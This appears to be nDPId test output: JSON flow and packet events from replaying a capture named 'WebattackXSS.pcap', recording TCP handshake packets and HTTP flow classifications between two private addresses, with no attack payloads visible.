+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7271,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":3,"flow_last_seen":1499347841230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347841230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06g9AAD4G28isEAABwKgKMoHoAFBN49cP5ETzqoAQAOUvOwAAAQEICgE8PQAD5g50"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347842491,"flow_last_seen":1499347842491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347842491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1499347842491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lUdAAD4GMImsEAABwKgKMoH2AFCtqqt8AAAAAKACchBEHwAAAgQFtAQCCAoBPD47AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":2,"flow_last_seen":1499347842491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgfYhjECLraqrfaAScSDPUAAAAgQFtAQCCAoD5g+wATw+OwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":3,"flow_last_seen":1499347842492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347842492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lUhAAD4GMJCsEAABwKgKMoH2AFCtqqt9IYxAjIAQAOVuVwAAAQEICgE8PjwD5g+w"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347845077,"flow_last_seen":1499347845077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347845077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1499347845077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IxAAD4G6UOsEAABwKgKMoIQAFCGLpxOAAAAAKACchB4KAAAAgQFtAQCCAoBPEDCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7303,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":2,"flow_last_seen":1499347845077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQghDt+J+Thi6cT6AScSDVXgAAAgQFtAQCCAoD5hI2ATxAwgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":3,"flow_last_seen":1499347845078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347845078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03I1AAD4G6UqsEAABwKgKMoIQAFCGLpxP7fiflIAQAOV0ZgAAAQEICgE8QMID5hI2"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347846345,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347846345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NftAAD4Gj9WsEAABwKgKMoIeAFCnQ3QEAAAAAKACchB+EgAAAgQFtAQCCAoBPEH\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":2,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347846345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgh6m5yHpp0N0BaAScSCexwAAAgQFtAQCCAoD5hNzATxB\/wEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":3,"flow_last_seen":1499347846345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347846345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NfxAAD4Gj9ysEAABwKgKMoIeAFCnQ3QFpuch6oAQAOU9zwAAAQEICgE8Qf8D5hNz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347847629,"flow_last_seen":1499347847629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347847629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7323,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1499347847629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TMtAAD4GeQWsEAABwKgKMoIsAFDM8A+LAAAAAKACchC7jwAAAgQFtAQCCAoBPENAAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":2,"flow_last_seen":1499347847629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347847629,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgizINJmdzPAPjKAScSBCAgAAAgQFtAQCCAoD5hS0ATxDQAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":3,"flow_last_seen":1499347847630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347847630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TMxAAD4GeQysEAABwKgKMoIsAFDM8A+MyDSZnoAQAOXhCQAAAQEICgE8Q0AD5hS0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347850209,"flow_last_seen":1499347850209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347850209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1499347850209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OS9AAD4GjKGsEAABwKgKMoJGAFCA5HzqAAAAAKACchCXnQAAAgQFtAQCCAoBPEXFAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":2,"flow_last_seen":1499347850209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347850209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgkZb8bIlgOR866AScSBvRgAAAgQFtAQCCAoD5hc5ATxFxQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":3,"flow_last_seen":1499347850210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347850210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OTBAAD4GjKisEAABwKgKMoJGAFCA5HzrW\/GyJoAQAOUOTgAAAQEICgE8RcUD5hc5"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347851476,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347851476,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d+RAAD4GTeysEAABwKgKMoJUAFCuljDmAAAAAKACchC0pAAAAgQFtAQCCAoBPEcCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":2,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347851476,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQglT2+WNtrpYw56AScSA+wAAAAgQFtAQCCAoD5hh2ATxHAgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":3,"flow_last_seen":1499347851476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347851476,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d+VAAD4GTfOsEAABwKgKMoJUAFCuljDn9vljboAQAOXdxwAAAQEICgE8RwID5hh2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347852742,"flow_last_seen":1499347852742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347852742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1499347852742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87IFAAD4G2U6sEAABwKgKMoJiAFDnuKS\/AAAAAKACchAGXwAAAgQFtAQCCAoBPEg+AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":2,"flow_last_seen":1499347852742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgmLb7idG57ikwKAScSDmbwAAAgQFtAQCCAoD5hmzATxIPgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":3,"flow_last_seen":1499347852743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347852743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07IJAAD4G2VWsEAABwKgKMoJiAFDnuKTA2+4nR4AQAOWFdwAAAQEICgE8SD4D5hmz"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 